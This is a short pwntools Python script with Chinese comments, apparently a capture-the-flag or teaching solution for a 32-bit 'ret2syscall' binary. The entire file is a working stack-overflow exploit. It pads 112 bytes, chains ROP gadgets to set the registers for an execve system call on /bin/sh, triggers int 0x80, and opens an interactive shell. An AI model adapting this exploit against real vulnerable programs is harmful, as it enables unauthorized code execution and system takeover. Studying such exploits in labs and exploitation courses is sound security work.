from pwn import *
# 构造Payload
sh = process('./ret2syscall')
# ROP链中的Gadgets地址
pop_eax_ret = 0x080bb196    # pop eax; ret
pop_edx_ecx_ebx_ret = 0x0806eb90  # pop edx; pop ecx; pop ebx; ret
int_0x80 = 0x08049421       # int 0x80; ret
binsh = 0x080be408          # /bin/sh的字符串地址
# 构造攻击的payload
payload = b'A' * 112  # 填充数据至偏移位置
payload += p32(pop_eax_ret)  # 设置eax寄存器
payload += p32(0xb)          # execve系统调用编号（0xb）
payload += p32(pop_edx_ecx_ebx_ret)  # 设置edx, ecx, ebx寄存器
payload += p32(0)            # edx = 0
payload += p32(0)            # ecx = 0
payload += p32(binsh)        # ebx = /bin/sh地址
payload += p32(int_0x80)     # 触发int 0x80中断执行系统调用
# 发送payload并启动交互
sh.sendline(payload)
sh.interactive()  # 获取交互式shell
